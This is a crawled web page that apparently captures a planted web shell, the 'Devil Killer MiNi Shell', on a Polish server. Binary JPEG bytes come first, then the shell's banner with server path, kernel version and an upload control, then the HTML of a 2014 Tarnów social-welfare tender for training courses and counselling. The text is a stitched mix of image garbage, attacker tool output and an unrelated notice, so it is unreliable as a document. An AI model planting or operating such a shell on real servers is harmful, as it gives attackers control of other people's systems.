JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140811/267708-N-2014.html

<p class="kh_header"><b>Tarnów: Organizacja i przeprowadzenie poradnictw, warsztatów, doradztwa, kursów, szkoleń realizowanych przez Miejski Ośrodek Pomocy Społecznej w Tarnowie w ramach projektu systemowego - Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie- w tym Programu Aktywności Lokalnej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji</b><br>
<b>Numer ogłoszenia: 267708 - 2014; data zamieszczenia: 11.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tarnowie , Al. Matki Bożej Fatimskiej 9, 33-100 Tarnów, woj. małopolskie, tel. 14 688 20 20, faks 14 688 20 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie poradnictw, warsztatów, doradztwa, kursów, szkoleń realizowanych przez Miejski Ośrodek Pomocy Społecznej w Tarnowie w ramach projektu systemowego - Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie- w tym Programu Aktywności Lokalnej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie poradnictw,warsztatów, doradztwa, kursów, szkoleń dla  131 osób w wieku aktywności zawodowej, uczestników projektu pn. Stawiamy na aktywność. Działania aktywizujące klientów Miejskiego Ośrodka Pomocy Społecznej w Tarnowie, w tym Programu Aktywności Lokalnej, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1.
Zamówienie zostało podzielone na  VI częsci: 
Zadanie I: Zorganizowanie i przeprowadzenie  poradnictw, szkolenia: 
A) Zorganizowanie i przeprowadzenie poradnictwa specjalistycznego z psychologiem pn. Budowanie własnego wizerunku, 
B) Zorganizowanie i przeprowadzenie szkolenia Trening kompetencji społecznych, 
C) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa pracy z elementami prawa cywilnego oraz przepisami dotyczącymi ochrony praw lokatorów, 
D) Zorganizowanie i przeprowadzenie  poradnictwa z  prawnikiem  z zakresu prawa rodzinnego, 
E) Zorganizowanie i przeprowadzenie  poradnictwa Szkoła dobrego rodzicielstwa, 
F) Zorganizowanie i przeprowadzenie poradnictwa z psychologiem Radzenie sobie ze stresem. 
Zadanie II: Zorganizowanie i przeprowadzenie doradztwa zawodowego oraz warsztatów aktywnego poszukiwania pracy i warsztatów aktywizacji zawodowej:
A) Zorganizowanie i przeprowadzenie doradztwa zawodowego, 
B) Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy, 
C) Zorganizowanie i przeprowadzenie warsztatów aktywizacji zawodowej. 
Zadanie III: Zorganizowanie i przeprowadzenie kursów: obsługi kasy fiskalnej, programów magazynowych i fakturujących (magazynier), kursu - księgowość komputerowa,  obsługi komputera i urządzeń biurowych, sprzedawca z obsługą kasy fiskalnej, fakturzysta z obsługą kasy fiskalnej:
A) Kurs obsługi kasy fiskalnej,  programów  magazynowych i fakturujących (magazynier), 
B) Kurs - księgowość komputerowa, 
C) Kurs obsługi komputera i urządzeń biurowych, 
D) Kurs sprzedawca z obsługą kasy fiskalnej, 
E) Kurs fakturzysta z obsługą kasy fiskalnej. 
Zadanie IV:  Zorganizowanie i przeprowadzenie kursu - opiekun środowiskowy, kursu - florysta z obsługą kasy fiskalnej, kursu kosmetycznego: 
A) Kurs - opiekun środowiskowy, 
B) Kurs -  Florysta z obsługą kasy fiskalnej, 
C) Kurs kosmetyczny. 
Zadanie V: Zorganizowanie i przeprowadzenie kursu kierowca - operator wózków jezdniowych, kursu operator suwnicy oraz kursu podstawowy spawania metodą TIG - 141: 
A) Kurs  kierowca - operator wózków jezdniowych, 
B) Kurs -  operator suwnicy kat. I S, 
C) Kurs podstawowy spawania metodą TIG - 141. 
Zadanie VI:   Zorganizowanie i przeprowadzenie kursów prawa jazdy: 
A) Kurs prawa jazdy kat. B,  
B)  Kurs prawa jazdy kategorii C, 
C)  Kurs prawa jazdy kategorii C + E..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt 6 Prawa zamówień publicznych - wartości nie większej niż 20% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień,  zgodnych z przedmiotem zamówienia podstawowego - w ramach poszczególnych zadań.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.00.00-9, 80.41.12.00-0, 79.11.10.00-5, 79.14.00.00-7, 85.12.12.70-6, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku zadań:  Nr I, III, IV, V - Wykonawca spełni niniejszy warunek jeżeli jest wpisany do  rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy  właściwy ze względu na  siedzibę  Wykonawcy - zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia 
i instytucjach rynku pracy (Dz. U. z 2013 r.  poz. 674, z późn. zm.),  
=========================, w przypadku zadania Nr II A, B i C:  Zorganizowanie i przeprowadzeni doradztwa zawodowego,  zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy,  zorganizowanie i przeprowadzenie  warsztatów aktywizacji zawodowej, Wykonawca spełni niniejszy warunek jeżeli: 
1.  jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na  siedzibę  Wykonawcy - zgodnie z  art. 20 ust. 1 ustawy z dnia 20 kwietnia  2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r. poz. 674,  z późn. zm.),  

 2. działalność  gospodarcza Wykonawcy  w  zakresie świadczenia usług poradnictwa zawodowego jest wpisana do rejestru podmiotów prowadzących agencje zatrudnienia, prowadzonego przez marszałka województwa właściwego dla siedziby  Wykonawcy - zgodnie z  art. 18 ustawy z dnia 20 kwietnia  2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r. poz. 674,  z późn. zm.),
w przypadku zadania Nr VI A, B i C: Zorganizowanie 
i przeprowadzenie kursów prawa jazdy: kategorii  B, kategorii C oraz kategorii C +E, Wykonawca spełni niniejszy warunek jeżeli: 

1.	jest wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy  właściwy ze względu na  siedzibę  Wykonawcy - zgodnie z  art. 20 ust. 1 ustawy z dnia 20 kwietnia  2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2013 r.  poz. 674,  z późn. zm.), 

2.	 działalność gospodarcza Wykonawcy w zakresie prowadzenia  ośrodka szkolenia kierowców  została wpisana do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców, prowadzonego przez starostę właściwego ze względu na  miejsce prowadzenia ośrodka szkolenia kierowców  w rozumieniu ustawy  z dnia  5 stycznia  2011 r. o kierujących pojazdami (Dz. U. z 2014 r. poz.  600).Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1  Prawa zamówień publicznych  - sporządzonego według wzoru stanowiącego załącznik nr 2 do  specyfikacji istotnych warunków zamówienia (dotyczy zadań:  I - VI).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku zadań: I - VI Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1  Prawa zamówień publicznych  - sporządzonego według wzoru stanowiącego załącznik nr 2 do  specyfikacji istotnych warunków zamówienia (dotyczy zadań:  I - VI).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie  zadań: I, II, III, IV, V zadania A i B, VI, 
Zamawiający nie stawia  szczególnych wymagań w zakresie spełniania  tego warunku,  W zakresie zadania V C: Zorganizowanie i przeprowadzenie Kursu podstawowego spawania metodą TIG - 141: 
Wykonawca musi posiadać aktualny atest np. Instytutu Spawalnictwa w Gliwicach, Urzędu Dozoru Technicznego lub jednorazową zgodę na przeprowadzenie kursu dla spawaczy (objęty przedmiotem zamówieniem) lub posiadać dopuszczenie jednostki uznanej krajowej lub zagranicznej, wydającej  certyfikaty zgodnie z normą PN - EN 287-1 lub PN - EN ISO 9606. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1  Prawa zamówień publicznych  - sporządzonego według wzoru stanowiącego załącznik nr 2 do  specyfikacji istotnych warunków zamówienia (dotyczy zadań:  I - VI).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek dysponowania osobami zdolnymi do wykonania zamówienia jeżeli:
=========1.  w zakresie zadania I: 
A) Zorganizowanie i poradnictwa specjalistycznego z  psychologiem pn. Budowanie własnego wizerunku:  

Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej dwiema osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi dyplom ukończenia studiów psychologicznych, które przeprowadziły minimum dwa poradnictwa (kursy,  szkolenia,  warsztaty, doradztwa, zajęcia), których zakres tematyczny - w przypadku każdego poradnictwa -  obejmował przynajmniej następujące zagadnienia z zakresu budowania własnego wizerunku: techniki wywierania pozytywnego wrażenia, efektywna komunikacja jako narzędzie autoprezentacji, profesjonalna prezentacja, sposoby eliminacji stresu, 

 
  B) Zorganizowanie i przeprowadzenie szkolenia Trening
         kompetencji społecznych:
 
Wykonawca wykaże, że dysponuje  lub będzie dysponować co najmniej jedną osobą, która będą uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów psychologicznych, która przeprowadziła minimum  dwa szkolenia (kursy, poradnictwa,  warsztaty, zajęcia), których zakres tematyczny - w przypadku każdego szkolenia - obejmował przynajmniej dwa moduły odpowiadające tematyce będącej przedmiotem zamówienia (moduły występujące w opisie przedmiotu zamówienia: I moduł - komunikacja  interpersonalna, II moduł - rozwiązywanie problemów oraz umiejętności radzenia sobie w trudnych sytuacjach, III moduł - uwierz w siebie, IV moduł - umiejętności społeczne),  

C) Zorganizowanie i przeprowadzenie poradnictwa z prawnikiem z zakresu prawa pracy, elementami prawa  cywilnego oraz przepisami dotyczącymi ochrony praw lokatorów: 

Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej dwiema  osobami, posiadającą dyplom ukończenia studiów prawniczych, które będą uczestniczyć w wykonywaniu zamówienia, które przeprowadziły minimum dwa poradnictwa (kursy, warsztaty, doradztwa, zajęcia, szkolenia), których zakres tematyczny - w przypadku każdego poradnictwa - obejmował przynajmniej trzy moduły odpowiadające tematyce będącej przedmiotem zamówienia (moduły występujące w opisie przedmiotu zamówienia - I moduł - nawiązywanie umów o pracę, II moduł - zatrudnianie, III moduł - zmiana warunków  zatrudnienia i rozwiązywanie umów o pracę, IV moduł -  czas pracy, V moduł - wybrane zagadnienia z prawa cywilnego dotyczące  umów pożyczek, poręczenia,  egzekucji cywilnej,  VI moduł: zasady i formy ochrony praw lokatorów oraz zasady gospodarowania  mieszkaniowym zasobem  gminy),  


D) Zorganizowanie i przeprowadzenie poradnictwa 
z prawnikiem  z zakresu prawa rodzinnego: 
 
Wykonawca wykaże, że dysponuje lub będzie dysponować osobą posiadająca dyplom ukończenia studiów prawniczych, która będzie uczestniczyć w wykonywaniu zamówienia, która przeprowadziła minimum dwa poradnictwa (kursy,  warsztaty, doradztwa, zajęcia, szkolenia), których zakres tematyczny - w przypadku każdego poradnictwa -  obejmował przynajmniej dwa moduły odpowiadające tematyce będącej przedmiotem zamówienia (moduły występujące w  opisie przedmiotu zamówienia - I moduł - ustanie małżeństwa (rozwód, unieważnienie małżeństwa), II moduł - majątkowe ustroje małżeńskie, III moduł - obowiązek alimentacyjny, IV moduł -  władza rodzicielska, V moduł - sposoby ustalania pochodzenia dziecka), 

E) Zorganizowanie i przeprowadzenie poradnictwa  specjalistycznego z psychologiem pn. Szkoła dobrego rodzicielstwa:

Wykonawca wykaże, że dysponuje lub będzie dysponować przynajmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów psychologicznych, która przeprowadziła minimum dwa poradnictwa (kursy, szkolenia, warsztaty, doradztwa, zajęcia), których zakres tematyczny - w przypadku każdego poradnictwa -  obejmował przynajmniej następujące zagadnienia: 
- budowanie poczucia własnej wartości oraz samodzielności dziecka, 
- komunikacja w rodzinie i rozwiązywanie  problemów wychowawczych, młodzieńczy bunt, 
- rozwiązywanie konfliktów w rodzinie, 
- zagrożenia:  alkohol, narkotyki, zaburzenia łaknienia itp.,
- budowanie poczucia własnej wartości,
- praktyczne zastosowanie metod wychowawczych 
z uwzględnieniem indywidualnych cech  dziecka,  

F) Zorganizowanie i przeprowadzenie poradnictwa 
z psychologiem pn. Radzenie sobie ze stresem:
Wykonawca wykaże, że dysponuje lub będzie dysponować przynajmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą dyplom ukończenia studiów psychologicznych, która  przeprowadziła minimum dwa  poradnictwa (kursy, szkolenia,  warsztaty, doradztwa, zajęcia), których zakres tematyczny - w przypadku każdego poradnictwa -  obejmował przynajmniej następujące zagadnienia: 
- teoria stresu i jego wpływ na człowieka,
- mechanizmy i rodzaje stresu, 
- konsekwencje spowodowane chronicznym stresem, 
- techniki relaksacji, 
- metody radzenia sobie ze stresem, 

===============================================
	2. w zakresie zadania II: 
	A) Zorganizowanie i przeprowadzenia doradztwa zawodowego: 
  Wykonawca wykaże, że dysponuje lub będzie dysponować przynajmniej jedną osobą, posiadającą kwalifikacje do wykonywania zawodu doradca zawodowy, która posiada co najmniej trzyletni staż w zakresie poradnictwa zawodowego oraz przeprowadziła co najmniej dwie usługi indywidualnego doradztwa zawodowego, których zakres tematyczny - 
w przypadku każdej usługi - obejmował przynajmniej jeden 
z następujących tematów: stworzenie Indywidualnego Planu Działania, redagowanie dokumentów aplikacyjnych, praktyczne przegotowanie do rozmowy kwalifikacyjnej z pracodawcą,    
 
B) Zorganizowanie i przeprowadzenie warsztatów aktywnego poszukiwania pracy: 
Wykonawca wykaże, że dysponuje lub będzie dysponować przynajmniej jedną osobą, posiadającą kwalifikacje  do wykonywania zawodu doradca zawodowy, która posiada co najmniej trzyletni staż w zakresie poradnictwa zawodowego oraz przeprowadziła co najmniej dwie usługi grupowego doradztwa zawodowego, których zakres tematyczny - w przypadku każdej usługi - obejmował przynajmniej  następujące zagadnienia: 
- metody poszukiwania pracy, 
- przygotowanie dokumentów aplikacyjnych, 
- przygotowanie do rozmowy kwalifikacyjnej, 

C) Zorganizowanie i przeprowadzenie warsztatów aktywizacji zawodowej: 
Wykonawca wykaże, że dysponuje lub będzie dysponować przynajmniej jedną osobą, posiadającą kwalifikacje  do wykonywania zawodu doradca zawodowy, która posiada co najmniej trzyletni staż w zakresie poradnictwa zawodowego oraz przeprowadziła co najmniej dwie  usługi  grupowego doradztwa zawodowego, których zakres tematyczny - w przypadku każdej usługi - obejmował przynajmniej następujące zagadnienia: 
- dokonywanie samooceny; analiza wykształcenia, doświadczenia zawodowego, zainteresowań, umiejętności,
- przygotowanie dokumentów aplikacyjnych, przygotowanie do rozmowy  z pracodawcą, 
- autoprezentacja w kontaktach z pracodawcą, sposoby aktywnego poszukiwania pracy,
- planowanie kariery zawodowej, 
- wybór kierunku dalszego kształcenia, szkolenia zawodowego oraz miejsca pracy, 
===============================================
3. w  zakresie zadania III: Zorganizowanie i przeprowadzenie kursów: 
A)	 obsługi kasy fiskalnej, programów magazynowych i programów fakturujących (magazynier), 
B)	księgowość komputerowa, 
C)	obsługi komputera i urządzeń biurowych, 
D)	sprzedawca z obsługą kasy fiskalnej, 
E)	fakturzysta z obsługą kasy fiskalnej: 
Wykonawca wykaże, że  dysponuje lub będzie  dysponować co najmniej jedną osobą (w przypadku każdego kursu), która będzie uczestniczyć w wykonywaniu zamówienia, która  uczestniczyła  - w charakterze wykładowcy, trenera, instruktora,  itp. w realizacji minimum dwóch kursów (szkoleń, zajęć), których zakres tematyczny - w przypadku każdego kursu - odpowiadał tematyce będącej przedmiotem zamówienia, tj.: 
-  obsługi kasy fiskalnej, programów magazynowanych i programów fakturujących (w przypadku zadania III A),

-  obsługi  programów  komputerowych z zakresu księgowości 
(w przypadku zadania III B), 

- kursu obsługi komputera, którego zakres tematyczny  obejmował przynajmniej następujące zagadnienia: 
a) przetwarzanie tekstów, 
b  arkusze kalkulacyjne,
c) obsługa drukarki, innych urządzeń peryferyjnych oraz urządzeń biurowych, 
d) tworzenie baz danych i raportów (w przypadku zadania III C),

-  obsługi kasy fiskalnej i programów fakturujących 
        (w przypadku zadań III D i E),



===============================================
4. w zakresie zadania IV: Zorganizowanie i przeprowadzenie: 

 A) kursu opiekun środowiskowy: 
Wykonawca wykaże, że  dysponuje lub będzie  dysponować co najmniej  jedną  osobą, która będzie uczestniczyć w wykonywaniu zamówienia, która uczestniczyła  - w charakterze wykładowcy, trenera, instruktora,  itp. w realizacji minimum  dwóch kursów  (szkoleń, zajęć), których zakres tematyczny - w przypadku każdego kursu - obejmował przynajmniej następujące zagadnienia: wybrane zagadnienia z zakresu  psychologii, gerontologii i psychiatrii, podstawy higieny i pielęgnacji, udzielanie pomocy przedmedycznej, 

B)	kursu - florysta z obsługą kasy fiskalnej:
Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, która  uczestniczyła  - w charakterze wykładowcy, trenera, instruktora,  itp. w realizacji minimum dwóch kursów (szkoleń, zajęć), których zakres tematyczny - w przypadku każdego kursu - obejmował przynajmniej następujące zagadnienia: 
-	sposoby  utrwalania materiału roślinnego, 
-	style w kompozycjach, 
-	florystyka ślubna, 
-	florystyka żałobna, 
-	dekoracje okolicznościowe, 
-	dekoracje doniczkowe, 
-	kompozycje z roślin suchych, sztucznych, 
-	obsługa kasy fiskalnej (budowa i obsługa kasy fiskalnej, praca przy kasie fiskalnej - rejestracja sprzedaży i programowanie kas fiskalnych), 

C) kursu kosmetycznego:  
Wykonawca wykaże, że dysponuje lub będzie  dysponować co najmniej jedną  osobą, która będzie uczestniczyć w wykonywaniu zamówienia, która przeprowadziła minimum dwa kursy 
(szkolenia, zajęcia), których zakres tematyczny - w przypadku każdego kursu - obejmował przynajmniej jeden moduł odpowiadający tematyce będącej przedmiotem zamówienia (moduły występujące w opisie przedmiotu zamówienia - I moduł - ogólne informacje o skórze człowieka, preparatach do pielęgnacji skóry, II moduł -  pielęgnacja i oczyszczanie skóry), 

===============================================
5. w zakresie zadania V:  Zorganizowanie i przeprowadzenie: 
A) kursu kierowca - operator wózków jezdniowych, 

Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej dwiema osobami, które będą uczestniczyć w wykonywaniu zamówienia, które uczestniczyły  - w charakterze wykładowcy, instruktora, itp. w realizacji minimum dwóch kursów kierowca - operator wózków jezdniowych, 

B) kursu -  operator suwnicy (kat. I S) :  
Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, które uczestniczyły - w charakterze wykładowcy, instruktora, itp. w realizacji minimum dwóch kursów - operator suwnicy,  

C) kursu podstawowego spawania metodą TIG (141)
Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej dwiema osobami, które będą uczestniczyć w wykonywaniu zamówienia, które  uczestniczyły - w charakterze wykładowcy, instruktora, itp. w realizacji minimum dwóch kursów spawania metodą TIG (141), 
===============================================
6. w zakresie zadania VI: Zorganizowanie i przeprowadzenie: 
A) Kursu  prawa jazdy kategorii B: 
Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej dwoma instruktorami nauki jazdy kategorii B, którzy będą  uczestniczyć w wykonywaniu zamówienia, posiadającymi uprawnienia do szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami kat. B, posiadającymi minimum 
2 letnie doświadczenie zawodowe oraz  uczestniczyli - 
w charakterze instruktora w realizacji minimum trzech kursów prawa jazdy kategorii B, 
B) Kursu prawa jazdy kategorii C: 
Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej jednym instruktorem nauki jazdy kategorii C, który będzie uczestniczyć w wykonywaniu zamówienia, posiadającym uprawnienia do szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami kat. C, posiadającym minimum 2 letnie doświadczenie zawodowe oraz uczestniczył - w charakterze instruktora w realizacji minimum trzech kursów prawa jazdy kategorii C, 
C) Kursu prawa jazdy kategorii  C+ E:  
Wykonawca wykaże, że  dysponuje lub będzie dysponować co najmniej jednym instruktorem nauki jazdy kategorii C  + E, który będzie uczestniczyć w wykonywaniu zamówienia, posiadającym uprawnienia do szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami kat. C+ E, posiadającymi  minimum 2 letnie doświadczenie zawodowe oraz  uczestniczył - w charakterze instruktora w realizacji minimum trzech kursów prawa jazdy kategorii C +E. 

